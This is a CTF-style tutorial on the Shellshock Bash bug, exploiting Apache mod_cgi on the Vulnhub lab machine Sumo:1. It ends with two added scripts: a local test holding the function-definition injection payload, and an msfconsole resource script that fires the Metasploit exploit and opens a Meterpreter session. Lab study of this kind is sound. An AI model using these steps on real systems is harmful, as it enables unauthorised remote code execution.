One of the most critical bugs of the last decade was Shellshock (CVE-2014-6271), a vulnerability that lets an attacker execute arbitrary code remotely through the Unix Bash shell. Shellshock is still a very real threat, especially on unpatched systems; it affected most Linux and UNIX-based operating systems. Nowadays you will find this vulnerability in many CTF challenges, so this article should help you recognise and exploit it. Shellshock is a security bug in Bash that causes it to execute commands taken from environment variables unintentionally. The bug relies on the fact that Bash, when it imports a function definition stored in an environment variable, incorrectly executes any commands that trail the function body. Therefore an attacker who can manipulate the environment variable list of a process that goes on to run Bash can execute arbitrary commands on the system, or reach other bugs in Bash's command parser. Running the usual one-line test on an affected version of Bash prints "vulnerable". Shellshock is actually an entire family of vulnerabilities (CVE-2014-6271 was followed by several related CVEs, such as CVE-2014-7169 for the incomplete first fix) with multiple exploitation vectors: anything that places attacker-controlled data in an environment variable and then spawns Bash, of which CGI scripts served by Apache are the classic case.

In this guide we will exploit the mod_cgi module that is part of the Apache HTTP Server. For this article I'll be using the boot2root machine "Sumo:1" from Vulnhub. I've also posted a detailed writeup for this machine, you can find it here. On running a quick nikto scan, we can see that this machine is vulnerable to Shellshock. To confirm it, we send a request to the target with curl that carries the payload in a request header, and the response contains the output of id for the user the web server runs as. This works because mod_cgi follows the CGI specification and exports every request header into the environment of the CGI script as an HTTP_* variable: the User-Agent header becomes HTTP_USER_AGENT (by default curl sends a value such as curl/7.47.0, depending on the curl version). If the CGI script is a Bash script, or spawns Bash, that variable is imported as a function definition and the trailing command runs. We can therefore store malicious code that sets up a reverse shell inside this header.

The same goal can also be achieved with Metasploit. We can search for exploits with the search command; many are available, but the one we need is the Apache mod_cgi exploit. Load this module with use and then type show options to see the settings we can change. For this attack we need to set RHOSTS to the IP address of the target machine and TARGETURI to the path of the CGI script, in this case /cgi-bin/test/test.cgi. Once these options are configured, run check to see whether the target is vulnerable and then run the exploit. A Meterpreter session opens, and typing shell gives us a shell on the target machine. That's it! I hope you understood the concept of the Shellshock vulnerability and how to exploit it.
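The local test referred to above, as an added example that is not part of the original post. It sets an environment variable whose value starts with `() {` so that Bash imports it as a function definition; an unpatched Bash also executes the trailing `echo vulnerable`, while a patched Bash prints only `this is a test` and a warning that it ignored the function definition attempt. The function name `shellshock_check` and its three result strings are this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): the classic local Shellshock test.
# An environment variable whose value begins with "() {" is imported by Bash as
# a function; CVE-2014-6271 lets the command after the closing brace run too.

# Prints "vulnerable", "patched" or "no-bash" on stdout; always returns 0 so
# it can be used inside $(...) under "set -e".
shellshock_check() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
    # 2>/dev/null hides the "ignoring function definition attempt" warning
    # that a patched Bash prints when it refuses the trailing command.
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo this is a test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
    return 0
}

shellshock_check
```

The check uses `env` rather than `export` so the crafted variable exists only for the child Bash and does not pollute the calling shell; the same one-liner run against a fixed Bash is also what a patch-verification script should expect to print `patched`.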
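The Metasploit steps above, written out as an msfconsole resource script so the run is repeatable; this is an added example and not part of the original post. The module name `exploit/multi/http/apache_mod_cgi_bash_env_exec` is the real Metasploit module for this vector; the target and attacker addresses are placeholders, and only the TARGETURI comes from the article. The helper `write_shellshock_rc` is this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): the Metasploit workflow from the
# article (use, set RHOSTS/TARGETURI, check, exploit) as a resource script.

# Write an msfconsole resource script. $1 = output path, $2 = target IP,
# $3 = CGI path, $4 = attacker IP (LHOST), $5 = listener port (LPORT).
# "check" runs the module's vulnerability check first; "run" then launches
# the exploit, which on success hands back a Meterpreter session.
write_shellshock_rc() {
    cat > "$1" <<EOF
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS $2
set TARGETURI $3
set LHOST $4
set LPORT $5
check
run
EOF
}

# Usage (placeholder addresses):
#   write_shellshock_rc shellshock.rc 192.168.56.101 /cgi-bin/test/test.cgi 192.168.56.1 4444
#   msfconsole -q -r shellshock.rc
```

Keep `check` before `run`: the module's check sends the same harmless header-based probe as the manual curl test, so a negative result saves you from firing a payload at a patched host or a wrong TARGETURI.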